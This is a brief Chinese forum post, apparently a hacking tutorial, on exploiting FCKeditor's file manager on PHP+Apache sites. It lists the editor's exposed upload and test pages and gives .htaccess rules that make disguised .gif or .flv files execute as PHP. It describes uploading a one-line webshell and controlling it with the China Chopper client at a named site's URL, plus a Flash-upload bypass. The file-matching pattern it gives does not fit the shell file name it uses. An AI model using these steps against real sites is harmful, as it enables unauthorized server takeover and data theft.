php+apache fckeditor漏洞利用
1.发现fckeditor目录存在,存在以下链接:FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=image&Connector=connectors/php/connector.php
2.创建1.htaccess文件,文件内容如下:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
3.上传1.htaccess和一句话木马文件fuckxx.php.gif 到同一目录,一般是UserFiles/File/目录下。
4.中国菜刀链接:http://www.kanwangluo.com/UserFiles/File/fuckxx.php.gif,
还有就是有些人可能会遇到在上传图片的时候,fckeditor报错,说是错误的文件什么的,这里有个方法:
可以换种上传类型,用Flash上传就不会碰到类似的限制,不过.htaccess文件的内容也要改改,还有shell的文件名
<FilesMatch "_php.flv">
SetHandler application/x-httpd-php
</FilesMatch>
shell的名字改成shell.php.flv 这样就可以了
页:
[1]